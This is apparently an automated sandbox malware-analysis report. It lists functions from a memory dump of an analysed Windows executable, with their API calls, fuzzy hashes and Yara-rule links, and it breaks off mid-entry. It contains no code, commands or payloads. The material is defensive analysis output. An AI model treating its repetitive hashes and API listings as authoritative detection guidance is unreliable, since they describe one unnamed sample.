                                                                                                                                                                                                                                  Function 00A06263 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 336comCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 00995851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,009955D1,?,?,009D4B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00995871
                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00A062C0
                                                                                                                                                                                                                                  • CoInitialize.OLE32(00000000), ref: 00A063DA
                                                                                                                                                                                                                                  • CoCreateInstance.OLE32(00A30CC4,00000000,00000001,00A30B34,?), ref: 00A063F3
                                                                                                                                                                                                                                  • CoUninitialize.OLE32 ref: 00A06411
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                                                                                                                                                                                                                                  • String ID: .lnk
                                                                                                                                                                                                                                  • API String ID: 3172280962-24824748
                                                                                                                                                                                                                                  • Opcode ID: e0a6aaa656054a4527e1f1def73af43b047ccf8476ec5eec2c73175b7dd8b6ec
                                                                                                                                                                                                                                  • Instruction ID: 9861e44eb88686ecdeb1bdd560c12fb020be4e2ce5ec3c0334e4c542a18f0e26
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e0a6aaa656054a4527e1f1def73af43b047ccf8476ec5eec2c73175b7dd8b6ec
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1DD14471A042059FCB14DF18D594A6ABBF5FF89718F14885CF8859B3A1CB32EC45CB92
                                                                                                                                                                                                                                  Function 00A286FC Relevance: 9.1, APIs: 6, Instructions: 82COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00A28740
                                                                                                                                                                                                                                  • SetWindowLongW.USER32(00000000,000000F0,?), ref: 00A28765
                                                                                                                                                                                                                                  • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00A2877D
                                                                                                                                                                                                                                  • GetSystemMetrics.USER32(00000004), ref: 00A287A6
                                                                                                                                                                                                                                  • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00A0C1F2,00000000), ref: 00A287C6
                                                                                                                                                                                                                                    • Part of subcall function 0099249F: GetWindowLongW.USER32(00000000,000000EB), ref: 009924B0
                                                                                                                                                                                                                                  • GetSystemMetrics.USER32(00000004), ref: 00A287B1
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Window$Long$MetricsSystem
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2294984445-0
                                                                                                                                                                                                                                  • Opcode ID: 616fc9c49a51bc446ad248791bd4a2118f0b7931007e39f7feffd40b7df9da84
                                                                                                                                                                                                                                  • Instruction ID: d4e291e513c0e2bfb2345e72c0c744af7c2ec2fdb4d192801a32846a16f33160
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 616fc9c49a51bc446ad248791bd4a2118f0b7931007e39f7feffd40b7df9da84
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 62218E71611261AFCB249F7CDC08A6A3BB6EB84325F244639F926C21E0EF748852CB50
                                                                                                                                                                                                                                  Function 009B36F2 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,009B36E9,009B3355), ref: 009B3700
                                                                                                                                                                                                                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 009B370E
                                                                                                                                                                                                                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 009B3727
                                                                                                                                                                                                                                  • SetLastError.KERNEL32(00000000,?,009B36E9,009B3355), ref: 009B3779
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3852720340-0
                                                                                                                                                                                                                                  • Opcode ID: 428bff0722c8ba7f2f3705af379baffb559754231c12b217e256c290e6237cc7
                                                                                                                                                                                                                                  • Instruction ID: 77ff051eeb42ea29e822525ee483238a2dec17a65e973e8f10afb8bbb4cbbd00
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 428bff0722c8ba7f2f3705af379baffb559754231c12b217e256c290e6237cc7
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AC0124B260A311AEA734E7F9EFC66E72A98EB447727308239F012840F1EF514E035140
                                                                                                                                                                                                                                  Function 009C30E7 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00000000,009B4D53,00000000,?,?,009B68E2,?,?,00000000), ref: 009C30EB
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 009C311E
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 009C3146
                                                                                                                                                                                                                                  • SetLastError.KERNEL32(00000000,?,00000000), ref: 009C3153
                                                                                                                                                                                                                                  • SetLastError.KERNEL32(00000000,?,00000000), ref: 009C315F
                                                                                                                                                                                                                                  • _abort.LIBCMT ref: 009C3165
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorLast$_free$_abort
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3160817290-0
                                                                                                                                                                                                                                  • Opcode ID: df075e4a6e0136532d5d15033b5af07e79f1e816dc844c9ad72eb916580de995
                                                                                                                                                                                                                                  • Instruction ID: 4dd17e5aabcae5d52e10fb77b20cc5be093f90c90b316747f28cb7bd8e21f0c1
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: df075e4a6e0136532d5d15033b5af07e79f1e816dc844c9ad72eb916580de995
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B1F02D35D4C6002FD221A779AC06F6E166DAFC0771B38C52CF914D21D2EF2489034263
                                                                                                                                                                                                                                  Function 00A29480 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 00991F2D: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00991F87
                                                                                                                                                                                                                                    • Part of subcall function 00991F2D: SelectObject.GDI32(?,00000000), ref: 00991F96
                                                                                                                                                                                                                                    • Part of subcall function 00991F2D: BeginPath.GDI32(?), ref: 00991FAD
                                                                                                                                                                                                                                    • Part of subcall function 00991F2D: SelectObject.GDI32(?,00000000), ref: 00991FD6
                                                                                                                                                                                                                                  • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00A294AA
                                                                                                                                                                                                                                  • LineTo.GDI32(?,00000003,00000000), ref: 00A294BE
                                                                                                                                                                                                                                  • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00A294CC
                                                                                                                                                                                                                                  • LineTo.GDI32(?,00000000,00000003), ref: 00A294DC
                                                                                                                                                                                                                                  • EndPath.GDI32(?), ref: 00A294EC
                                                                                                                                                                                                                                  • StrokePath.GDI32(?), ref: 00A294FC
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 43455801-0
                                                                                                                                                                                                                                  • Opcode ID: 3dabd882ff72a938e9b191b0a6259c45179d8fc0862e9fbb48c098adbdb393c5
                                                                                                                                                                                                                                  • Instruction ID: 2eefcd009b1b170ba75b942c796c689028a51c021ef9bb64032eb2531bfdfdd2
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3dabd882ff72a938e9b191b0a6259c45179d8fc0862e9fbb48c098adbdb393c5
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D811DB7600411DBFDF129F94EC89FAA7F6DEB08364F048021FA1A5A1B1C7719D56DBA0
                                                                                                                                                                                                                                  Function 009F5B61 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetDC.USER32(00000000), ref: 009F5B7C
                                                                                                                                                                                                                                  • GetDeviceCaps.GDI32(00000000,00000058), ref: 009F5B8D
                                                                                                                                                                                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 009F5B94
                                                                                                                                                                                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 009F5B9C
                                                                                                                                                                                                                                  • MulDiv.KERNEL32(000009EC,?,00000000), ref: 009F5BB3
                                                                                                                                                                                                                                  • MulDiv.KERNEL32(000009EC,00000001,?), ref: 009F5BC5
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CapsDevice$Release
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1035833867-0
                                                                                                                                                                                                                                  • Opcode ID: 5864d66facc39a7f2c3457bbe9c229775c2c9d45ba81b4c717fe2c33a957c4a5
                                                                                                                                                                                                                                  • Instruction ID: e23c608a63cf960e4c10915e88e7e3decdfe469013099f815560b017e623c99c
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5864d66facc39a7f2c3457bbe9c229775c2c9d45ba81b4c717fe2c33a957c4a5
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 07014475A00718BBEB109BE99C49F5EBF78EB44751F104065FB05A7291D6709C02CB90
                                                                                                                                                                                                                                  Function 0099327E Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • MapVirtualKeyW.USER32(0000005B,00000000), ref: 009932AF
                                                                                                                                                                                                                                  • MapVirtualKeyW.USER32(00000010,00000000), ref: 009932B7
                                                                                                                                                                                                                                  • MapVirtualKeyW.USER32(000000A0,00000000), ref: 009932C2
                                                                                                                                                                                                                                  • MapVirtualKeyW.USER32(000000A1,00000000), ref: 009932CD
                                                                                                                                                                                                                                  • MapVirtualKeyW.USER32(00000011,00000000), ref: 009932D5
                                                                                                                                                                                                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 009932DD
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Virtual
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 4278518827-0
                                                                                                                                                                                                                                  • Opcode ID: 09c92ace313e0d184d944100d6005fb9bdb9fae574bcf16d2c5436cd0ccaf6e1
                                                                                                                                                                                                                                  • Instruction ID: 8393ef8ad42879c18f1769cbfe50562581c3656c8bb438ce9c60bc4cc9836634
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 09c92ace313e0d184d944100d6005fb9bdb9fae574bcf16d2c5436cd0ccaf6e1
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 090167B0902B5ABDE3008F6A8C85B52FFA8FF19354F00411BA15C4BA42C7F5A864CBE5
                                                                                                                                                                                                                                  Function 009FF437 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 009FF447
                                                                                                                                                                                                                                  • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 009FF45D
                                                                                                                                                                                                                                  • GetWindowThreadProcessId.USER32(?,?), ref: 009FF46C
                                                                                                                                                                                                                                  • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 009FF47B
                                                                                                                                                                                                                                  • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 009FF485
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 009FF48C
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 839392675-0
                                                                                                                                                                                                                                  • Opcode ID: 5c935920c396d1ab3bfb446e6250e4d9247c6533e3d39817082ab25272d33634
                                                                                                                                                                                                                                  • Instruction ID: 91b5c5711f3edaafb366e7ba4906b6e3101bae1afd6d9d8f6eaf1f15d56726a2
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5c935920c396d1ab3bfb446e6250e4d9247c6533e3d39817082ab25272d33634
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 43F03A32241158BBE7319BA69C0EEFF3B7CEFC6B11F000168FA0191092D7A46A43C6B5
                                                                                                                                                                                                                                  Function 009D34D6 Relevance: 9.0, APIs: 6, Instructions: 39windowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetClientRect.USER32(?), ref: 009D34EF
                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00001328,00000000,?), ref: 009D3506
                                                                                                                                                                                                                                  • GetWindowDC.USER32(?), ref: 009D3512
                                                                                                                                                                                                                                  • GetPixel.GDI32(00000000,?,?), ref: 009D3521
                                                                                                                                                                                                                                  • ReleaseDC.USER32(?,00000000), ref: 009D3533
                                                                                                                                                                                                                                  • GetSysColor.USER32(00000005), ref: 009D354D
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 272304278-0
                                                                                                                                                                                                                                  • Opcode ID: 112d105ed7c4ca1b03f5030f89b3a58f87eae4347e2bbc6a59b80130262ac27a
                                                                                                                                                                                                                                  • Instruction ID: 568a170f10078a0a6fa72245eb83e92e510534e1c2124a54b72be472fdd5a89b
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 112d105ed7c4ca1b03f5030f89b3a58f87eae4347e2bbc6a59b80130262ac27a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3F014B31540105EFDB609FA8DC08BF97FB5FB04321F504571F91AA22A2CB751E53AB11
                                                                                                                                                                                                                                  Function 009F21C1 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 009F21CC
                                                                                                                                                                                                                                  • UnloadUserProfile.USERENV(?,?), ref: 009F21D8
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 009F21E1
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 009F21E9
                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 009F21F2
                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000), ref: 009F21F9
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 146765662-0
                                                                                                                                                                                                                                  • Opcode ID: 3fba248c381a700590c7a42ee1bf7f00da418c995e5e701086f4cbc9f14ef60e
                                                                                                                                                                                                                                  • Instruction ID: 05be635b55dc3e22ff3cf09b00414d677082175400956522287f7661f051ff6e
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3fba248c381a700590c7a42ee1bf7f00da418c995e5e701086f4cbc9f14ef60e
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FCE0E576004105BBDB119FE9EC0D92ABF39FF49322B104230F22586471CB329433DB90
                                                                                                                                                                                                                                  Function 009FCE7B Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 191windowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 009941EA: _wcslen.LIBCMT ref: 009941EF
                                                                                                                                                                                                                                  • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 009FCF99
                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 009FCFE0
                                                                                                                                                                                                                                  • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 009FD047
                                                                                                                                                                                                                                  • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 009FD075
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ItemMenu$Info_wcslen$Default
                                                                                                                                                                                                                                  • String ID: 0
                                                                                                                                                                                                                                  • API String ID: 1227352736-4108050209
                                                                                                                                                                                                                                  • Opcode ID: ad14f0518bb964f3baa5217173f5fff88ba4dc4896ebc2c1d7fb0a21609b69fe
                                                                                                                                                                                                                                  • Instruction ID: cea92b53e7852a571efed114d42117a3eda8f0e3fa0fa86e59396b44794a09a8
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ad14f0518bb964f3baa5217173f5fff88ba4dc4896ebc2c1d7fb0a21609b69fe
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4351E1716063089BD725EF28C945B7BB7E9AF85324F080A2DFA91D3191DB74CD068752
                                                                                                                                                                                                                                  Function 00A1B7C4 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 176COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • ShellExecuteExW.SHELL32(0000003C), ref: 00A1B903
                                                                                                                                                                                                                                    • Part of subcall function 009941EA: _wcslen.LIBCMT ref: 009941EF
                                                                                                                                                                                                                                  • GetProcessId.KERNEL32(00000000), ref: 00A1B998
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00A1B9C7
                                                                                                                                                                                                                                  Strings
